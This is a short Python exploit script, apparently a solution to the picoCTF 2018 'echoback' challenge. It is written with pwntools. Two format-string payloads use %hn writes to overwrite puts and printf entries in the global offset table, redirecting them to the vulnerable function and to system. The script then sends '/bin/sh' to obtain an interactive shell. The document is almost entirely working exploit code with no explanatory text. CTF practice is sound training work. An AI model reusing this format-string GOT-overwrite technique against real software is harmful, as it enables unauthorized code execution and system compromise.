pico CTF 2018 echo back

exploit.py

from pwn import *

p = process('./echoback')
e = ELF('./echoback')

vuln_low = 0x85ab
vuln_high = 0x10804
system_got_low = 0x8460
system_got_high = 0x10804
puts_got = e.got['puts']
printf_got = e.got['printf']

payload = p32(puts_got)
payload += p32(puts_got + 2)
payload += '%{}x'.format(vuln_low - 8)
payload += "%7$hn"
payload += '%{}x'.format(vuln_high - vuln_low)
payload += "%8$hn"
p.sendlineafter('\n', payload)

payload2 = p32(printf_got)
payload2 += p32(printf_got+2)
payload2 += "%{}x".format(system_got_low-8)
payload2 += "%7$hn"
payload2 += '%{}x'.format(system_got_high - system_got_low)
payload2 += "%8$hn"

p.sendlineafter("message:\n",payload2)
p.sendlineafter("message:\n","/bin/sh\x00")
p.interactive()